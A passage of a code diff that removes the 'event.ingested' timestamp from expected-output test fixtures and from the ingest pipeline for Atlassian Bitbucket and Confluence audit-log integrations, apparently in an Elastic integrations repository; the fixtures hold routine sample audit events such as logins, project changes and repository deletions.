granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.projectpermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"PROJECT_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"PROJECT_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036657,\"nano\":315000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -6498,7 +6416,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreated", - "ingested": "2021-12-24T00:37:41.020832811Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036657,\"nano\":316000000},\"version\":\"1.0\"}", "type": [ "creation" @@ -6593,7 +6510,6 @@ }, "event": { "action": "bitbucket.branch.audit.action.projectbranchmodelconfigurationcreated", - "ingested": "2021-12-24T00:37:41.020833539Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project branch model created\",\"actionI18nKey\":\"bitbucket.branch.audit.action.projectbranchmodelconfigurationcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Feature prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.featureprefix\",\"value\":\"feature/\"},{\"name\":\"Development branch\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.developmentbranch\",\"value\":\"(default branch)\"},{\"name\":\"Hotfix prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.hotfixprefix\",\"value\":\"hotfix/\"},{\"name\":\"Bugfix prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.bugfixprefix\",\"value\":\"bugfix/\"},{\"name\":\"Production branch\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.productionbranch\",\"value\":\"(none)\"},{\"name\":\"Release prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.releaseprefix\",\"value\":\"release/\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036657,\"nano\":333000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6663,7 +6579,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020834266Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036664,\"nano\":913000000},\"version\":\"1.0\"}", "type": [ "access" @@ -6751,7 +6666,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorymodificationrequested", - "ingested": "2021-12-24T00:37:41.020835009Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository change requested\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorymodificationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"TEST\",\"i18nKey\":\"bitbucket.service.repository.audit.changedvalue.repositorymodification.project\",\"key\":\"Project\",\"to\":\"AT\"}],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"old.project\\\":\\\"TEST\\\",\\\"new.project\\\":\\\"AT\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036669,\"nano\":514000000},\"version\":\"1.0\"}", "type": [ "change" @@ -6839,7 +6753,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorymodified", - "ingested": "2021-12-24T00:37:41.020835809Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository settings changed\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorymodified\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"TEST\",\"i18nKey\":\"bitbucket.service.repository.audit.changedvalue.repositorymodification.project\",\"key\":\"Project\",\"to\":\"AT\"}],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"old.project\\\":\\\"TEST\\\",\\\"new.project\\\":\\\"AT\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036669,\"nano\":527000000},\"version\":\"1.0\"}", "type": [ "change" @@ -6914,7 +6827,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020836533Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036669,\"nano\":632000000},\"version\":\"1.0\"}", "type": [ "access" @@ -6981,7 +6893,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020837275Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036677,\"nano\":550000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -7060,7 +6971,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020837999Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:09.732Z - 2021-11-27T18:11:17.550Z\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"39 - 238\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036677,\"nano\":629000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -7130,7 +7040,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorydeletionrequested", - "ingested": "2021-12-24T00:37:41.020838728Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository deletion requested\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorydeletionrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036760,\"nano\":133000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -7205,7 +7114,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorydeleted", - "ingested": "2021-12-24T00:37:41.020839462Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository deleted\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorydeleted\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"project\\\":\\\"AT\\\",\\\"repository\\\":\\\"test2\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036760,\"nano\":466000000},\"version\":\"1.0\"}", "type": [ "deletion" @@ -7272,7 +7180,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020840188Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036764,\"nano\":207000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -7351,7 +7258,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020840909Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"43 - 242\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:09.967Z - 2021-11-27T18:12:44.207Z\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036764,\"nano\":262000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -7416,7 +7322,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectdeletionrequested", - "ingested": "2021-12-24T00:37:41.020841973Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project deletion requested\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectdeletionrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036799,\"nano\":888000000},\"version\":\"1.0\"}", "type": [ "deletion" @@ -7486,7 +7391,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectdeleted", - "ingested": "2021-12-24T00:37:41.020842715Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project deleted\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectdeleted\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036799,\"nano\":960000000},\"version\":\"1.0\"}", "type": [ "deletion" @@ -7553,7 +7457,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020843448Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036804,\"nano\":368000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -7632,7 +7535,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020844243Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"47 - 246\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:10.643Z - 2021-11-27T18:13:24.368Z\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036804,\"nano\":428000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -7697,7 +7599,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectmodificationrequested", - "ingested": "2021-12-24T00:37:41.020844969Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project settings change requested\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectmodificationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036854,\"nano\":900000000},\"version\":\"1.0\"}", "type": [ "change" @@ -7785,7 +7686,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectmodified", - "ingested": "2021-12-24T00:37:41.020845700Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project settings changed\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectmodified\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"Test\",\"i18nKey\":\"bitbucket.service.project.audit.changedvalue.projectmodified.name\",\"key\":\"Name\",\"to\":\"Test1\"},{\"i18nKey\":\"bitbucket.service.project.audit.changedvalue.projectmodified.description\",\"key\":\"Description\",\"to\":\"sdasdfasdf\"}],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"old.name\\\":\\\"Test\\\",\\\"new.name\\\":\\\"Test1\\\",\\\"old.description\\\":null,\\\"new.description\\\":\\\"sdasdfasdf\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036854,\"nano\":978000000},\"version\":\"1.0\"}", "type": [ "change" @@ -7852,7 +7752,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020846428Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036858,\"nano\":395000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -7931,7 +7830,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020847150Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"51 - 250\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:10.661Z - 2021-11-27T18:14:18.395Z\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036858,\"nano\":451000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" diff --git a/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 336372f262b..685ebbd62df 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for processing sample logs processors: -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index a654fe9a7fa..50bdf4c2df6 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -69,7 +69,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837450218Z", "original": "{\"timestamp\":\"2021-11-23T00:44:36.398Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"79 - 178\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.166Z - 2021-11-23T00:43:12.188Z\"}]}", "type": "info", "kind": "event" @@ -152,7 +151,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837453799Z", "original": "{\"timestamp\":\"2021-11-23T00:43:12.188Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 